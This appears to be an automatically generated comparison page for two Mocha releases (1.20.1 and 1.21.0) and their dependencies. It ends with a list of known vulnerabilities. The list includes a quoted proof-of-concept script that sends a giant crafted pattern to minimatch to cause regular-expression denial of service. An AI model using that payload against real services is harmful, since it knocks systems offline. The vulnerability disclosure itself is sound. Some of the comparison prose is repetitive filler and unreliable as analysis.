Mocha version 1.21.0 arrived on July 24, 2014, succeeding version 1.20.1, released on June 4, 2014. Both versions maintain the core "simple, flexible, fun" testing framework promise, sharing key dependencies like 'diff' (1.0.7), 'glob' (3.2.3), 'jade' (0.26.3), the wildcard version of 'debug', 'mkdirp' (0.3.5), and 'commander' (2.0.0). Development dependencies remain consistent with 'should' (~4.0.0) and 'coffee-script' (1.2), ensuring continuity for developers relying on these tools for testing and compilation. The repository URL and author information are also identical, reflecting consistent ownership and development practices.
The primary, and perhaps most noticeable, difference lies within the 'growl' dependency. Version 1.20.1 relies on 'growl' version 1.7.x, while version 1.21.0 updates this to 'growl' version 1.8.x. While seemingly minor, this update could bring bug fixes, performance improvements, or new features to growl notifications, impacting users who utilize growl for test result feedback. Developers should evaluate the changelog of growl (1.8.x) to understand the precise implications of this update in their testing workflows. The update to growl is very important for developers looking for stability, meaning that while the change is small it is important.
Both versions are available via npm and share the same author and repository, making upgrades relatively seamless. Developers should always evaluate dependency updates to ensure compatibility with their existing projects.
All the vulnerabilities related to the version 1.21.0 of the package
Regular Expression Denial of Service (ReDoS)
A vulnerability was found in diff before v3.5.0, the affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) attacks.
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require(“minimatch”);
// utility function for generating long strings
var genstr = function (len, chr) {
var result = “”;
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
var exploit = “[!” + genstr(1000000, “\\”) + “A”;
// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);
Update to version 3.0.2 or later.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.
Growl before 1.10.0 vulnerable to Command Injection
Affected versions of growl do not properly sanitize input prior to passing it into a shell command, allowing for arbitrary command execution.
Update to version 1.10.0 or later.